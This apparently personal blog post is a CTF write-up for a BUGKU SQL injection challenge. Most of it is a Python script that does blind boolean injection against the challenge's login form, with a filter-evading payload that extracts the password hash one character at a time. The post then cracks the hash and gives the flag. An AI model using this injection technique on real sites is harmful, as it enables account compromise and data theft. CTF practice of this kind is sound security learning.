刘功瑞的博客-BUGKU CTF WEB Writeup 5

BUGKU CTF WEB Writeup 5

sql注入2

题目：

http://123.206.87.240:8007/web2/

全都tm过滤了绝望吗？

提示 !,!=,=,+,-,^,%

解题：

注入题，解题脚本

import requests as rq

flag = ""
url = 'http://123.206.87.240:8007/web2/login.php'
cookie = {
    'PHPSESSID': '6mjlen0aogfncavdcn79pe1t1lt1mbjo'
}
for i in range(1, 33):
    for j in '0123456789abcdef':
        username = "admin'-(ascii(mid(REVERSE(MID((passwd)from(-" + str(i) + ")))from(-1)))=" + str(ord(j)) + ")-'"
        data = {'uname': username, 'passwd': 'hu3sky'}
        r = rq.post(url=url, data=data, cookies=cookie)
        if "username error!!@_@" in r.text:
            flag = flag + j
            print(flag)

解出密码后，上www.somd5.com去解码MD5，得到密码为admin123。

登录后，随便输入什么，点击执行得到flag

flag{sql_iNJEct_comMon3600!}

« 2024年5月 »
一	二	三	四	五	六	日
	1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

« 2024年5月 »

一

二

三

四

五

六

日

刘功瑞的博客

有一天你突然惊醒，发现这一切，都只不过是一场梦。

2019年10月12日

BUGKU CTF WEB Writeup 5

sql注入2

作者:admin , 分类:CTF , 浏览:595 , 评论:0

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.